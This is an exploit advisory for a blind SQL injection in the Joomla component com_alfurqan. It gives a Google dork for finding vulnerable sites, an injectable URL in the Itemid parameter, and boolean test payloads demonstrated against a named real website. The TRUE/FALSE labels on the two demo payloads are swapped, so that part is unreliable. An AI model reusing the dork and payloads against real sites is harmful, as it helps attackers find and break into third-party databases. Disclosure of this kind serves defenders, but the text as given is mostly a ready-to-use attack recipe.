#Exploit Title: Joomla Component com_alfurqan Blind SQL Injection
#Google Dork: inurl:"com_alfurqan"
#Date: 28/01/2013
#Exploit Author: D35m0nd142
#Vendor Homepage: http://www.joomla.org/
----------------------------------------------------------------------------------------------
POC Exploit:
/index.php?option=com_alfurqan&action=viewayat&surano=2&Itemid=[BSQLI]
Exploit demo :
http://www.bccd.org/index.php/index.php?option=com_alfurqan&action=viewayat&surano=2&Itemid=165+and+1=2 <-- TRUE
http://www.bccd.org/index.php/index.php?option=com_alfurqan&action=viewayat&surano=2&Itemid=165+and+1=1 <-- FALSE
----------------------------------------------------------------------------------------------
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information